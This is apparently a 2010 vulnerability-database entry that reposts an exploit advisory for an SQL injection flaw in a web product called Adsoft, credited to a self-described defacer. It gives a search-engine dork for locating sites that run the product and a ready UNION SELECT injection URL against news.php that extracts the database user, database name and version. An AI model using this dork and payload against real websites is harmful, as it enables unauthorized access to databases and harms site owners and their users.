Adsoft Remote Sql Injection Vulnerability

2010-11-04T00:00:00
ID SECURITYVULNS:DOC:25086
Type securityvulns
Reporter Securityvulns
Modified 2010-11-04T00:00:00

Description

------------In The Name Of God------------

Adsoft Remote Sql Injection Vulnerability

AUTHOR: md.r00t

Mail: md.r00t.defacer@gmail.com

Forum: http://ajaxtm.com/forum

Google D0rk:

"Powered by AdSOFT"

Exploit:

www.site.com/news.php?id=-999//union//select/**/1,concat_ws(CHAR(32,58,32),user(),database(),version()),3,4,5,6--

TNX:

Aria-Security Team (Persian Security Network),hadihadi(Virangar Security Team),

Ajax Security Team